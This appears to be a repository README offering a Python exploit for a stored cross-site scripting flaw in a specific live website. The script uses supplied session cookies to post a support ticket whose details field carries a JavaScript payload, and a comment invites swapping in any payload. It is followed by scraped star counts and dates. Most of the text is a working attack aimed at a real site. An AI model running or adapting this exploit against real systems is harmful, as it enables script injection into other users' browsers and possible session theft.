AnonStress Stored XSS Exploit
An exploit and demonstration on how to exploit a Stored XSS vulnerability in https://anonstress.com.
Details
| Vulnerability | Severity | Description |
|---|---|---|
| Stored XSS | 5.0/10 | This vulnerability allows attackers to execute arbitrary javascript code on a victims browser. |
Exploit
import sys
import requests
# https://anonstress.com Stored XSS Exploit
# Date: 09/25/21
# Author: Tactical
class Exploit:
def __init__(self, sesion_cookie, other_cookie):
self.sesion_cookie = sesion_cookie
self.other_cookie = other_cookie
self.title_name = "testone" # The name for the ticket | Note: You can change this.
self.xss_payload = "<script>alert(1)</script>" # Edit your own payload here if you would like.
def run(self):
site_cookies = {
"31k001c": self.other_cookie,
"fc_session": self.sesion_cookie
}
payload = {
"n3k0t": self.other_cookie,
"title": self.title_name,
"status": "1",
"details": self.xss_payload
}
s = requests.Session()
s.post("https://anonstress.com/support/ticket/create", cookies=site_cookies, data=payload)
def main() -> None:
if len(sys.argv) < 3:
print("Usage: python3 exploit.py <fc_session_cookie> <31k001c_cookie>")
sys.exit()
sesion_cookie = sys.argv[1]
other_cookie = sys.argv[2]
Exploit(sesion_cookie, other_cookie).run()
if __name__ == "__main__":
main()
Video & Demonstration by pin
https://user-images.githubusercontent.com/86132648/134786149-3f44568c-3fd3-442f-86bb-dd552cdfd1c8.mp4
1 Dec 03, 2021
21 Dec 09, 2022
3 Oct 18, 2022
3 Apr 13, 2022
81 Dec 12, 2022
764 Jan 05, 2023
893 Jan 04, 2023
430 Dec 27, 2022
214 Dec 19, 2022
1k Jan 04, 2023
32 Jan 02, 2023
135 Dec 14, 2022
2 Jan 22, 2022
15 Feb 21, 2022
27 Dec 25, 2022
71 Dec 22, 2022
48 Aug 28, 2022
4 Jan 17, 2022
10 Apr 15, 2022
48 Jun 20, 2022